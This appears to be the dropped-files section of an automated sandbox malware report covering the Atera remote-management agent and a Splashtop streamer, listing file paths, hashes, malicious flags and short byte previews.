                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                        Entropy (8bit):3.2361007384381857
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKIU5+7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:KLkPlE99SCQl2DUeXJlOA
                                                                                                                                                                                                                                        MD5:2DD525DAFF8CDBD0DE335A7C40AC46EA
                                                                                                                                                                                                                                        SHA1:DC98D2344D389C995DAC6A7D957637D69A04739D
                                                                                                                                                                                                                                        SHA-256:62E29E55108ABFB7C35249B1F8941FD8DCBC74D53FCC3945E0BAB4425AF40EE1
                                                                                                                                                                                                                                        SHA-512:B4119ABC3ABDCA60E23BE489DAFE9E6762B8299333FB11217DE96E23C5B48758080393276D10C4284B3C86769DEAAC3C287DFA5243B2CD88A7CA6B516B16D01C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ........5.t.P..(....................................................... ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):400
                                                                                                                                                                                                                                        Entropy (8bit):3.9602192261644635
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKm1jmYXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:e/mxMiv8sFzD3quqDkPh8Y2ZM
                                                                                                                                                                                                                                        MD5:BED426458BBAA66A98BB7F57CB56D937
                                                                                                                                                                                                                                        SHA1:685E227ECC1FF17BC194F7372C1AA4BAA35A7DBD
                                                                                                                                                                                                                                        SHA-256:13E375DD9A0DE22CD8A72667194CF740C9DE9B3E9A20CF811E8016EEEBFE08C9
                                                                                                                                                                                                                                        SHA-512:54D7EB428A5CBD4B269127929C5956F18253200D2E082BE10EEDF00C4C1F5566ABDDDE8EEE694BC5FE8AF4024DE8E2F99CEE75AD8CD2076532451BB8F0EBE5B8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ........k.O..P..(..................q.O.....mU.....................mU.. ..........3.P.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):404
                                                                                                                                                                                                                                        Entropy (8bit):3.905048057094278
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kK3feJUtHge9QfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhl+KscSi8:+e6aQmxMiv8sF3HtllJZIvOP205scn8
                                                                                                                                                                                                                                        MD5:148DA135AA10A8B134C021195BB237A9
                                                                                                                                                                                                                                        SHA1:433C59468405332066C4D5BDE1FC2E8241558D82
                                                                                                                                                                                                                                        SHA-256:62D38AF609C649EF78E305A85537991652034D72E200C0ACBA759C70B09D5543
                                                                                                                                                                                                                                        SHA-512:F2473C4E04F93041AAFB30CB4022AECBAE1704B0F2F9F9804716E45C5CFD1B0725CF85AD9215222D310037862EF4DAC47A659FD82CF61F208DC5B21D5BB278A4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... .... ... ..5.P..(.................ph.P...../xU...................../xU.. ............P.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.o.o.S.Z.l.4.5.Y.m.N.9.A.o.j.j.r.i.l.U.u.g.%.3.D...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                        Entropy (8bit):3.2026083612081218
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKdfFzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:itWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                        MD5:ABFCA88DE49902201D801F0A086B1052
                                                                                                                                                                                                                                        SHA1:FE2E23568CB86B27C8D067B6D7788DE8A5691674
                                                                                                                                                                                                                                        SHA-256:96076FEB4B3D05590CAE0D7BD147E0D9204A747353B2AABE30FFC74BEBFDA9A1
                                                                                                                                                                                                                                        SHA-512:862BA2FA1D777559FC528BC5AE80FC782620E660A262CFFE7C1F5539674C0B15EE38B87D744582C12C720455E326B381E0DA859F150B8033CFA4EB78C21E1EBA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ........h._.P..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                        Entropy (8bit):3.970608066539058
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKHrIC0+bfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:/o+bmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                        MD5:860550B601BFDB73B64CF303485BE97D
                                                                                                                                                                                                                                        SHA1:1A30DB3957A3DF8C5F37A0200A01FCB58BBDC7CC
                                                                                                                                                                                                                                        SHA-256:CC9E0FD38BA83F350F90D0335FAAA302EB585CB98C049AFC056DFC43BB9A110F
                                                                                                                                                                                                                                        SHA-512:C7FCC2B11D5B8D4FD7F57D3CEA464A88BB31D9637F090BF277C5AF566AF300A2046A158E08B43A882830A943493848FC02034188297D1D458798E7D67AFE1447
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ....(...z.e..P..(..................9.O.....bjU.....................bjU.. ........W.#.P.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                        Entropy (8bit):3.06077288271926
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:kKdlzLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:VpLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                        MD5:B38E451F57A3494494406062B5434325
                                                                                                                                                                                                                                        SHA1:D3CDF05C00BF982043753189069023B36A6A9B14
                                                                                                                                                                                                                                        SHA-256:467008FE87343623669777B1CA61C561E6CD1FE80041DCC742AA1D0F82C23C41
                                                                                                                                                                                                                                        SHA-512:8534D36AAA67C8F66E9AA9B3CEFBBB1B1D69CDFCF0116C087E069D84F1911B2B602A6AF2E464C60FF0DBD65D6E914D4F7C4ABB9427EAA5BFC6A354C7B162C71F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:p...... ....l.......P..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1944
                                                                                                                                                                                                                                        Entropy (8bit):5.343420056309075
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQg8mHDp684YHKGSI6oPtHTHhAHKKkhHNpaHKlT44HKmHKe60:iqzCYqGSI6oPtzHeqKkhtpaqZ44qmq10
                                                                                                                                                                                                                                        MD5:437E4DCFC04CB727093C5232EA15F856
                                                                                                                                                                                                                                        SHA1:81B949390201F3B70AE2375518A0FFD329310837
                                                                                                                                                                                                                                        SHA-256:5EADB9774A50B6AD20D588FDA58F5A42B2E257A0AA26832B41F8EA008C1EB96B
                                                                                                                                                                                                                                        SHA-512:0332C7E5205CF9221172473A841284487ACC111780A58557231FCDE72A5EDB7E7E3EF6C87AB9682A688BC24992A74027F930267B541039BD8757EEF4E2F51A0E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1983
                                                                                                                                                                                                                                        Entropy (8bit):5.345248756179348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKksHVsHT6HNHOHKCHKlT40HKe60:iqbYqGSI6oPtzHeqKks1sz6tuqCqZ40T
                                                                                                                                                                                                                                        MD5:F974F0FCD981AC0581C5498C0155EF91
                                                                                                                                                                                                                                        SHA1:0CF6D5F41937B296EF9D37FC90E56EC8458B96DF
                                                                                                                                                                                                                                        SHA-256:500B63AEC50B89EF4CEC9ED49E53D168CDC35D235CB416B84234D3E45F3AC365
                                                                                                                                                                                                                                        SHA-512:1484917CC2A8E88DD4010FEE60394BD974D5C44ED0482DAD64B06A319E1F7E414321B8BDB06C6DE70152CFEA887BBDEFD2F2689C077251E8D2BBC9448FBF8719
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runtime\2702

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):3043
                                                                                                                                                                                                                                        Entropy (8bit):5.361093730986187
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKk9HVsHUHhHKe6PfHKWA1eXrHKlT4d6HNHGHPmHKm:iqbYqGSI6oPtzHeqKk91s0Bq13qhA7qp
                                                                                                                                                                                                                                        MD5:7FBB3BC293626F02EEE5D12A2FC44FE7
                                                                                                                                                                                                                                        SHA1:A736DE9B60CEC25864AE995EF046F3F317B5D1AC
                                                                                                                                                                                                                                        SHA-256:B6ED7FB8E1D3A5AB9858099700CDA16766D6F442587CD6F965815CF8AFC1444D
                                                                                                                                                                                                                                        SHA-512:C175AF1525508EEA8DEAE8BE67E4780922492B3D01ACDB36B43220DE5B57898F10558F80C5D6218B61A236D35C41047527C6AD00770F477E23507AAEA7EF2000
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Net.Http\f4

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageOsUpdates.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):1933
                                                                                                                                                                                                                                        Entropy (8bit):5.381647656863045
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkCHKe6PfHKWA1eXrHKlT4fHeHK/:iqbYqGSI6oPtzHeqKkCq13qhA7qZ4f+m
                                                                                                                                                                                                                                        MD5:52CDAA83C48EDB391B9D77AE080A7F05
                                                                                                                                                                                                                                        SHA1:BC3E421F10517820F55349F0C636CE6F5AC43D25
                                                                                                                                                                                                                                        SHA-256:CC4BC1EB52CD4548732E5120182DE3E3B7F5D9191BAF7B0D40DF17D30D0C0D5C
                                                                                                                                                                                                                                        SHA-512:FDFA5A33A156B89D4772A5A503ECD01B5780CD88B2286FDD0DFA47477A7EF58C5F5720CA591A7F27014AB5ED7A6CE3CDA0E71CD329332498F207AC4439626813
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\545a9409c1

                                                                                                                                                                                                                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1075
                                                                                                                                                                                                                                        Entropy (8bit):5.353521172341231
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNa8mE4Dp689:MxHKQwYHKGSI6oPtHTHhAHKKka8mHDpN
                                                                                                                                                                                                                                        MD5:BDADAD127D5A6079C29C0C870A5C3C2C
                                                                                                                                                                                                                                        SHA1:AD5D30886AE959F271CF777D386A31CD792C9A64
                                                                                                                                                                                                                                        SHA-256:7186B9EAC66BD83E5E1C050D81529BC68511538118E65019EBECFD952C22FD55
                                                                                                                                                                                                                                        SHA-512:198087F52C39A32ACE7A90E9212C2AA0F31EDF8349773C8C6C5495CA82C890F9A8A44356AC5AEBB42F3342E6BE981DC4BCFE1D7FB43760745D7240A117257725
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv7

                                                                                                                                                                                                                                        C:\Windows\Temp\AteraSetupLog.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):227704
                                                                                                                                                                                                                                        Entropy (8bit):3.786363625258347
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:3wleXydG4aCq4LwzdvMALm2R4JqDgqiyECqm8qc8OZW3RtCBQrTYSrzwN0hfZ7T+:3iJjCl/0iyjmh1kwdfMmJmBH
                                                                                                                                                                                                                                        MD5:5D21C0CCD5EB37F6FA870E80CC8A36BD
                                                                                                                                                                                                                                        SHA1:D925D8A16F4B138D1A52FC6BBBFB8B94049ED437
                                                                                                                                                                                                                                        SHA-256:40B24136CEA910E5F957FEFC2496DAC9FB9FD554FC5F01F809F503A8F61862A2
                                                                                                                                                                                                                                        SHA-512:8E3A7CF76365AA12B4CFE0BD2433A850350B407D5E36D1EC9220260EF0352CD0EF8BEA0681BACDC496CDB29328D13FD177FDCFAB912AB10F3FC30DB21F53351D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\AteraSetupLog.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .1.7./.1.2./.2.0.2.4. . .1.2.:.4.6.:.3.8. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.5.0.:.3.0.). .[.1.2.:.4.6.:.3.8.:.2.6.3.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.5.0.:.3.0.). .[.1.2.:.4.6.:.3.8.:.2.6.3.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.5.0.:.3.0.). .[.1.2.:.4.6.:.3.8.:.2.6.3.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.W.i.n.d.o.w.s.\.T.E.M.P.\.a.t.e.r.a.A.g.e.n.t.S.e.t.u.p.6.4._.1._.8._.7._.2...m.s.i..... . . . . . . . . . . .*.*.*.*.*.*.*. .A.c.t.i.o.n.:. ..... . . . . . . . . . . .*.*.*.*.*.*.*. .C.o.m.m.a.n.d.L.i.n.e.:. .*.*.*.*.*.*.*.*.*.*.....M.S.I. .(.c.). .(.5.0.:.3.0.). .[.1.2.:.4.6.:.

                                                                                                                                                                                                                                        C:\Windows\Temp\SplashtopStreamer.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):47606910
                                                                                                                                                                                                                                        Entropy (8bit):7.954230752745685
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:786432:6x6nOlttpvhus+cERcrYSjOAYU41gWJDJn051AOnsC/C6VMIMuIs3zMD88qi:xnOdpvYs+cvrrjOAYfDJnEAOns5w5k8k
                                                                                                                                                                                                                                        MD5:07DD0B6E7987AE783DB77B895EA7ABED
                                                                                                                                                                                                                                        SHA1:28203FF998E9E84BB6C546E95992C89B97A9AB83
                                                                                                                                                                                                                                        SHA-256:AE49783C6C83139F2D8FCD4C978C5961C7C423F95020CA642C883BEB44E6E1CF
                                                                                                                                                                                                                                        SHA-512:E53D66D891B6F118B61FEE5E82029ABB78A07448BEBA19247F4712F8EFDE826BB673D397E2DB26D3A592781E737626B3E786147BB3B39BF2275993A7B81E0BB9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
